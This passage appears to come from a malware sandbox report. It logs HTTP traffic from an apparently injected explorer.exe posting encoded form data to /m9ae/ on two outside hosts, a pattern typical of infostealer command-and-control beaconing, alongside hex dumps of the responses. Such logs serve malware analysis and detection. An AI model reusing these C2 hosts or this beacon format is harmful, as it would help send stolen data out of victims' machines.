                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ppmx3%2Fmljui8xsmPVraI20AsZqA9t96QF4k3x67sBGyVFBHb0aCzMahr8TwgM4nWzcuGCWLl5vmxSytvmkqC4UXxsdFu9jiV4OdMNqiut7Tdset8YzAx9zGqzn194d1YI982IO8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 771a5cde5fe59130-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.549717172.67.214.24380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:44.738449097 CET224OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.dailyheraldresearch.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.dailyheraldresearch.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.dailyheraldresearch.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6e 38 75 4b 52 72 6f 73 30 77 37 45 71 78 39 70 38 52 68 55 79 4e 37 74 79 35 47 53 70 7a 4e 49 76 4a 4f 45 45 6a 4f 66 77 76 70 4c 47 30 72 55 61 71 6c 37 57 4f 4a 57 6e 34 6b 36 6f 45 36 44 45 43 6b 73 64 57 4c 6a 73 55 61 4b 66 4d 4c 37 65 6e 7a 69 33 4c 64 42 47 62 77 33 5a 63 63 2d 6e 77 34 4c 65 7a 44 33 50 46 49 4a 53 62 77 69 6f 42 31 49 48 4e 49 6f 7a 73 6f 76 68 7a 42 36 76 4f 5a 34 78 65 41 2d 65 48 38 6f 6b 53 71 42 6a 4e 71 49 6c 37 69 49 6f 64 42 2d 71 72 69 56 51 63 46 56 53 79 72 6a 30 47 71 57 56 38 6b 2d 7e 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=n8uKRros0w7Eqx9p8RhUyN7ty5GSpzNIvJOEEjOfwvpLG0rUaql7WOJWn4k6oE6DECksdWLjsUaKfML7enzi3LdBGbw3Zcc-nw4LezD3PFIJSbwioB1IHNIozsovhzB6vOZ4xeA-eH8okSqBjNqIl7iIodB-qriVQcFVSyrj0GqWV8k-~g).
                                                                                                                        Nov 29, 2022 10:34:45.082472086 CET225INHTTP/1.1 405 Method Not Allowed
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Allow: GET, HEAD
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hJQr6qhJQZ5Np4Deu7E3UtV2osB9thhAq9Px%2BQ4SbV1MAjs91ri0WClH%2BAW6EVVk4tTVwBZdKF6NG0gdhfQ0%2FEMczyFSAWL0vRFf%2FBtz0ZgecynJH4oqoQ4yMIRnsC66ZeBOBYG7eqJbZhyVMXM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 771a5969a87d5c38-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Data Raw: 39 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: 9a<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                        Nov 29, 2022 10:34:45.082529068 CET225INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.549719172.67.214.24380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:46.780267000 CET233OUTGET /m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.dailyheraldresearch.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:34:47.155785084 CET233INHTTP/1.1 520
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:47 GMT
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ROMropAzP5HwCCORr7lksM1w%2FkVdXpQ6FcL4xXtD%2ByRyh8wA%2FNSHTOp1Ncx%2B8B1RSz4PXfu6f%2BHR0Up5T%2FvaXASunUp1HyqugC%2BsnlYtOYLs80cPUc7yxPxMWHbOTo0LgdGQrTBwEzKBStxmVvM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 771a59766908916e-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.549720206.83.40.9280C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:52.743576050 CET235OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.publickit.website
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.publickit.website
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.publickit.website/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 61 7a 6d 37 41 4a 33 58 34 39 31 75 77 66 4a 75 66 62 6b 64 47 53 73 53 4f 2d 37 70 43 43 74 36 58 31 62 63 75 38 65 31 33 78 35 6c 68 6f 33 4b 4c 46 53 77 62 43 79 79 78 33 71 4b 5a 65 4f 5a 63 4b 72 38 73 4a 39 6c 33 67 56 64 52 76 47 77 44 57 66 57 57 74 61 45 58 49 37 56 67 61 6f 77 6b 64 54 54 6c 71 5a 79 69 4a 46 49 66 52 75 56 43 5a 77 2d 44 37 6b 32 6a 75 6a 43 6f 48 79 75 36 45 62 59 46 42 35 78 7a 67 32 32 75 5f 31 56 42 76 32 58 33 70 35 33 55 79 44 31 4e 33 45 66 7a 31 74 76 62 6b 79 45 73 5a 76 42 34 77 45 77 38 49 37 4c 4b 61 72 43 6e 55 28 69 30 5a 56 57 42 7a 30 51 4b 67 75 50 7a 6c 31 42 6d 50 51 79 46 6e 7e 77 53 57 4f 49 6f 48 38 79 54 6a 52 55 4f 71 68 69 56 78 74 5a 7a 47 51 52 28 4f 62 78 50 4e 6a 63 5a 49 4e 57 41 4d 51 79 42 64 44 39 73 67 70 73 57 42 73 2d 63 6c 71 62 4f 4a 54 6d 4c 4f 42 69 7a 56 53 62 4d 75 70 39 6e 55 45 41 36 68 65 79 6d 32 6a 77 6e 41 42 5f 42 62 4c 5a 53 61 6a 73 65 63 34 46 39 70 47 34 69 53 44 53 58 4f 5a 68 62 47 59 62 50 4c 61 42 76 47 37 51 6e 69 28 78 62 4d 6b 30 37 6e 6a 6b 75 47 35 62 73 55 72 62 7a 51 78 62 53 37 44 6a 47 4e 69 75 46 55 52 49 66 37 4e 4f 57 46 56 4d 6e 75 6f 54 34 32 55 49 54 78 56 79 67 50 74 65 63 72 31 52 4e 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=azm7AJ3X491uwfJufbkdGSsSO-7pCCt6X1bcu8e13x5lho3KLFSwbCyyx3qKZeOZcKr8sJ9l3gVdRvGwDWfWWtaEXI7VgaowkdTTlqZyiJFIfRuVCZw-D7k2jujCoHyu6EbYFB5xzg22u_1VBv2X3p53UyD1N3Efz1tvbkyEsZvB4wEw8I7LKarCnU(i0ZVWBz0QKguPzl1BmPQyFn~wSWOIoH8yTjRUOqhiVxtZzGQR(ObxPNjcZINWAMQyBdD9sgpsWBs-clqbOJTmLOBizVSbMup9nUEA6heym2jwnAB_BbLZSajsec4F9pG4iSDSXOZhbGYbPLaBvG7Qni(xbMk07njkuG5bsUrbzQxbS7DjGNiuFURIf7NOWFVMnuoT42UITxVygPtecr1RNA).
                                                                                                                        Nov 29, 2022 10:34:52.781203032 CET236INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:52 GMT
                                                                                                                        Server:
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Length: 2038
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 20 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 68 31 3e 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 22 3e 0a 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 61 63 74 69 76 65 22 3e 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 20 48 6f 6d 65 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 70 72 69 76 61 63 79 2e 68 74 6d 6c 22 3e 20 50 72 69 76 61 63 79 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 64 69 73 63 6c 61 69 6d 65 72 2e 68 74 6d 6c 22 3e 20 44 69 73 63 6c 61 69 6d 65 72 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 2d 62 67 74 6f 70 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 20 54 6f 20 72 65 6d 6f 76 65 20 79 6f 75 72 73 65 6c 66 20 66 72 6f 6d 20 66 75 74 75 72 65 20 65 6d 61 69 6c 20 3c 2f 61 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 66 6f 72 6d 31 22 20 6e 61 6d 65 3d 22 66 6f 72 6d 31 22 20 6d 65 74 68 6f 64 3d 22 70
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Publickit.website</title> <link href="images/default.css" rel="stylesheet" type="text/css" /></head><body><div id="wrapper"> <div id="header"> <div id="logo"> <h1><a href="#">Publickit.website</a></h1> </div> </div> <div id="menu"> <ul> <li class="active"><a href="index.html"> Home </a></li> <li><a href="privacy.html"> Privacy </a></li> <li><a href="disclaimer.html"> Disclaimer </a></li> </ul> </div> <div id="page"> <div id="page-bgtop"> <div id="content"> <div class="post"> <h2 class="title" align="center"><a href="#"> To remove yourself from future email </a></h2> <div class="entry"> <center> <form id="form1" name="form1" method="p
                                                                                                                        Nov 29, 2022 10:34:52.781259060 CET237INData Raw: 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 74 68 69 73 2e 76 61 6c 75 65 3d 27 27
                                                                                                                        Data Ascii: ost" action=""> <input type="text" onclick="this.value='' " name="email" value="" placeholder="Enter your e-mail here" style="padding:10px;" /> <br> <br> <br>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.549721206.83.40.9280C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:54.846709967 CET238OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.publickit.website
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.publickit.website
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.publickit.website/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 61 7a 6d 37 41 4a 33 58 34 39 31 75 77 73 4e 75 65 4a 4d 64 4f 79 73 53 43 65 37 76 43 43 74 39 58 31 62 59 75 39 4c 77 32 47 6c 6c 68 35 48 4b 49 33 71 77 61 43 79 74 36 58 71 56 58 2d 50 44 63 4b 72 47 73 4c 70 6c 33 67 78 64 52 76 57 77 45 6c 6e 56 45 39 61 43 62 6f 37 57 6b 61 6f 6c 6b 65 33 48 6c 76 52 79 69 4c 4e 49 66 69 47 56 42 4c 59 68 48 62 6b 72 7e 65 6a 4a 68 6e 79 71 36 45 61 37 46 42 35 50 7a 69 7e 32 76 50 46 56 48 4b 43 51 38 70 35 2d 58 79 43 66 48 55 70 44 78 45 46 6e 62 6c 66 58 7a 4a 62 57 37 79 42 6f 76 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=azm7AJ3X491uwsNueJMdOysSCe7vCCt9X1bYu9Lw2Gllh5HKI3qwaCyt6XqVX-PDcKrGsLpl3gxdRvWwElnVE9aCbo7Wkaolke3HlvRyiLNIfiGVBLYhHbkr~ejJhnyq6Ea7FB5Pzi~2vPFVHKCQ8p5-XyCfHUpDxEFnblfXzJbW7yBovw).
                                                                                                                        Nov 29, 2022 10:34:54.881488085 CET240INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:54 GMT
                                                                                                                        Server:
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Length: 2038
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 20 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 68 31 3e 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 22 3e 0a 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 61 63 74 69 76 65 22 3e 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 20 48 6f 6d 65 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 70 72 69 76 61 63 79 2e 68 74 6d 6c 22 3e 20 50 72 69 76 61 63 79 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 64 69 73 63 6c 61 69 6d 65 72 2e 68 74 6d 6c 22 3e 20 44 69 73 63 6c 61 69 6d 65 72 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 2d 62 67 74 6f 70 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 20 54 6f 20 72 65 6d 6f 76 65 20 79 6f 75 72 73 65 6c 66 20 66 72 6f 6d 20 66 75 74 75 72 65 20 65 6d 61 69 6c 20 3c 2f 61 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 66 6f 72 6d 31 22 20 6e 61 6d 65 3d 22 66 6f 72 6d 31 22 20 6d 65 74 68 6f 64 3d 22 70
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Publickit.website</title> <link href="images/default.css" rel="stylesheet" type="text/css" /></head><body><div id="wrapper"> <div id="header"> <div id="logo"> <h1><a href="#">Publickit.website</a></h1> </div> </div> <div id="menu"> <ul> <li class="active"><a href="index.html"> Home </a></li> <li><a href="privacy.html"> Privacy </a></li> <li><a href="disclaimer.html"> Disclaimer </a></li> </ul> </div> <div id="page"> <div id="page-bgtop"> <div id="content"> <div class="post"> <h2 class="title" align="center"><a href="#"> To remove yourself from future email </a></h2> <div class="entry"> <center> <form id="form1" name="form1" method="p
                                                                                                                        Nov 29, 2022 10:34:54.881524086 CET241INData Raw: 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 74 68 69 73 2e 76 61 6c 75 65 3d 27 27
                                                                                                                        Data Ascii: ost" action=""> <input type="text" onclick="this.value='' " name="email" value="" placeholder="Enter your e-mail here" style="padding:10px;" /> <br> <br> <br>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.549722206.83.40.9280C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:56.894845009 CET241OUTGET /m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.publickit.website
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:34:56.929251909 CET243INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:56 GMT
                                                                                                                        Server:
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Length: 2038
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 20 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 75 62 6c 69 63 6b 69 74 2e 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 68 31 3e 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 22 3e 0a 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 61 63 74 69 76 65 22 3e 3c 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 20 48 6f 6d 65 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 